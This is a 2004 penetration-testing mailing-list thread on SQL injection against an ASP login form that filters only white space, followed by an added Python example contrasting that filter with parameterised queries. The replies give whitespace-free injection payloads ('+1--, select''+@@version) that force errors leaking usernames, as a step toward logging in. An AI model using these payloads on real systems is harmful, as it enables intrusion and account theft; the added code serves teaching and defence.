Penetration Testing mailing list archives

RE: How to evade white spaces in a SQL injection


From: "Jeff Bryner" <jeff () jeffbryner com>
Date: Mon, 29 Mar 2004 22:08:43 -0800

Tough to give more without specifics but
you could aim for a query like:

select * from users where useid=useid+1
or
select * from users where useid=''+1

The 2nd one is more likely since they're probably adding the ' character to
whatever you enter.
So you'd enter '+1-- as the username. The first ' ends the ' they add, the
+1 tells sql to add 1 to a character field, which it can't do, the --
comments out the remainder of the query so it doesn't get parsed.  SQL will
then return an error telling you it can't convert some valid username to an
int to complete your request for adding 1 to the username.

For example in sql try the following queries and see the return:
select *
from sysusers
where
user=user+1

select *
from sysusers
where
user=''+1

You'll get a message telling you that it can't convert some username to int.
This will tell you a valid username, then you go for a password..then you're
in!

Jeff.

-----Original Message-----
From: Falcifer [mailto:falcifer2001 () yahoo es]
Sent: Thursday, March 25, 2004 4:35 PM
To: jeff () jeffbryner com
Cc: pen-test () securityfocus com
Subject: Re: How to evade white spaces in a SQL injection


Sorry, but I don't understand it.

Can you explain it a bit more;

Suppose that the original query is:
select * from users where useid=&my_user_without_spaces and
password=&password

where &my_user_without_spaces and &password were the inputs submitted
by the webform, but both vars without spaces;

Thanks

On Thu, 25-03-2004 at 18:13, Jeff Bryner wrote:
--- Falcifer <falcifer2001 () yahoo es> wrote:
Hi,

I've one application coded in ASP with a login form and the only
character that it validates is the white space.

Can I perform a SQL injection on it? How?

SQL is nice enough to do some automatic parsing for you..so

select''+@@version

will work.  Of course if the validation is client side, just bypass it.



=====
Jeff
-----------------------
You... you can't dump me! I'm using your name for all my passwords! What
exactly am I supposed to do about that!?

- Justin Simoni



---------------------------------------------------------------------------
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
www.coresecurity.com/promos/sf_ept1
----------------------------------------------------------------------------
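The thread's point is that rejecting white space is not a defence: the payload '+1-- contains none, and only the way the query is built decides whether it is data or syntax. The following is an added example, not code from the thread or from either poster: it runs the form's whitespace check against that payload, shows the string-concatenated login query it produces, and contrasts it with the same lookup using bound parameters on an in-memory SQLite table (table name, columns and the alice/s3cret account are constructed; SQL Server's conversion error from the thread is not reproduced in SQLite).

```python
"""Whitespace filtering vs. parameterised queries for the login in this thread.

Added example, not from the mailing-list post. The 'users' table, its
columns and the single account are constructed sample data.
"""
import sqlite3

# Constructed sample account (plaintext only to keep the example short).
SAMPLE_USERS = [("alice", "s3cret")]


def passes_whitespace_filter(value: str) -> bool:
    """The only check the ASP form in the thread applies: no white space."""
    return not any(ch.isspace() for ch in value)


def build_login_query_vulnerable(userid: str, password: str) -> str:
    """Query built by string concatenation, as the thread reconstructs it.
    The input closes the quote the application adds, and -- comments out
    the rest of the WHERE clause, password check included."""
    return ("select * from users where userid='" + userid
            + "' and password='" + password + "'")


def _connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (userid text, password text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return conn


def login_safe(userid: str, password: str):
    """Bound parameters: the driver passes the payload as a literal value,
    so the quote and the -- never reach the SQL parser as syntax."""
    conn = _connect()
    row = conn.execute(
        "select userid from users where userid=? and password=?",
        (userid, password),
    ).fetchone()
    conn.close()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "'+1--"
    print(passes_whitespace_filter(payload))           # True: filter lets it through
    print(build_login_query_vulnerable(payload, "x"))  # password clause is commented out
    print(login_safe(payload, "x"))                    # None
    print(login_safe("alice", "s3cret"))               # alice
```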



